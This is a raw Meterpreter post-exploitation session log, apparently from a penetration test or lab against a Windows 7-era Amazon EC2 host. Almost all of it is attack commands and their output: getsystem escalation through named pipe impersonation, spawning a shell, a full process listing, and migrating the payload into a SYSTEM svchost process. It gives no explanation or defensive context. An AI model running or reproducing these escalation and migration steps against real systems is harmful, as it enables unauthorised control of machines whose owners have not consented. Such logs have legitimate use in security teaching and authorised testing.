escalate:

*/............................................................................................................................................./*
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
Process 2988 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

meterpreter > ps

Process List
============

 PID   PPID  Name        Arch  Session  User              Path
 ---   ----  ----        ----  -------  ----              ----
 0     0     [System Pr
             ocess]
 4     0     System      x64   0
 416   4     smss.exe    x64   0        NT AUTHORITY\SYS  \SystemRoot\Syst
                                        TEM               em32\smss.exe
 432   708   svchost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\Syste
             e                          TEM               m32\svchost.exe
 480   708   svchost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\syste
             e                          TEM               m32\svchost.exe
 564   556   csrss.exe   x64   0        NT AUTHORITY\SYS  C:\Windows\syste
                                        TEM               m32\csrss.exe
 612   556   wininit.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\syste
             e                          TEM               m32\wininit.exe
 620   604   csrss.exe   x64   1        NT AUTHORITY\SYS  C:\Windows\syste
                                        TEM               m32\csrss.exe
 660   604   winlogon.e  x64   1        NT AUTHORITY\SYS  C:\Windows\syste
             xe                         TEM               m32\winlogon.exe
 708   612   services.e  x64   0        NT AUTHORITY\SYS  C:\Windows\syste
             xe                         TEM               m32\services.exe
 716   612   lsass.exe   x64   0        NT AUTHORITY\SYS  C:\Windows\syste
                                        TEM               m32\lsass.exe
 724   612   lsm.exe     x64   0        NT AUTHORITY\SYS  C:\Windows\syste
                                        TEM               m32\lsm.exe
 832   708   svchost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\syste
             e                          TEM               m32\svchost.exe
 900   708   svchost.ex  x64   0        NT AUTHORITY\NET  C:\Windows\syste
             e                          WORK SERVICE      m32\svchost.exe
 948   708   svchost.ex  x64   0        NT AUTHORITY\LOC  C:\Windows\Syste
             e                          AL SERVICE        m32\svchost.exe
 1016  660   LogonUI.ex  x64   1        NT AUTHORITY\SYS  C:\Windows\syste
             e                          TEM               m32\LogonUI.exe
 1080  708   svchost.ex  x64   0        NT AUTHORITY\LOC  C:\Windows\syste
             e                          AL SERVICE        m32\svchost.exe
 1184  708   svchost.ex  x64   0        NT AUTHORITY\NET  C:\Windows\syste
             e                          WORK SERVICE      m32\svchost.exe
 1312  708   spoolsv.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\Syste
             e                          TEM               m32\spoolsv.exe
 1348  708   svchost.ex  x64   0        NT AUTHORITY\LOC  C:\Windows\syste
             e                          AL SERVICE        m32\svchost.exe
 1428  708   amazon-ssm  x64   0        NT AUTHORITY\SYS  C:\Program Files
             -agent.exe                 TEM               \Amazon\SSM\amaz
                                                          on-ssm-agent.exe
 1484  708   LiteAgent.  x64   0        NT AUTHORITY\SYS  C:\Program Files
             exe                        TEM               \Amazon\XenTools
                                                          \LiteAgent.exe
 1616  708   Ec2Config.  x64   0        NT AUTHORITY\SYS  C:\Program Files
             exe                        TEM               \Amazon\Ec2Confi
                                                          gService\Ec2Conf
                                                          ig.exe
 1904  2072  mscorsvw.e  x64   0        NT AUTHORITY\SYS  C:\Windows\Micro
             xe                         TEM               soft.NET\Framewo
                                                          rk64\v4.0.30319\
                                                          mscorsvw.exe
 1944  708   svchost.ex  x64   0        NT AUTHORITY\NET  C:\Windows\syste
             e                          WORK SERVICE      m32\svchost.exe
 2072  708   mscorsvw.e  x64   0        NT AUTHORITY\SYS  C:\Windows\Micro
             xe                         TEM               soft.NET\Framewo
                                                          rk64\v4.0.30319\
                                                          mscorsvw.exe
 2080  832   WmiPrvSE.e  x64   0        NT AUTHORITY\NET  C:\Windows\syste
             xe                         WORK SERVICE      m32\wbem\wmiprvs
                                                          e.exe
 2368  708   svchost.ex  x64   0        NT AUTHORITY\LOC  C:\Windows\syste
             e                          AL SERVICE        m32\svchost.exe
 2420  708   sppsvc.exe  x64   0        NT AUTHORITY\NET  C:\Windows\syste
                                        WORK SERVICE      m32\sppsvc.exe
 2544  708   svchost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\Syste
             e                          TEM               m32\svchost.exe
 2580  708   vds.exe     x64   0        NT AUTHORITY\SYS  C:\Windows\Syste
                                        TEM               m32\vds.exe
 2728  708   SearchInde  x64   0        NT AUTHORITY\SYS  C:\Windows\syste
             xer.exe                    TEM               m32\SearchIndexe
                                                          r.exe
 3064  708   TrustedIns  x64   0        NT AUTHORITY\SYS  C:\Windows\servi
             taller.exe                 TEM               cing\TrustedInst
                                                          aller.exe

meterpreter > migrate 2544
[*] Migrating from 1312 to 2544...
[*] Migration completed successfully.


meterpreter>
*/............................................................................................................................................./*

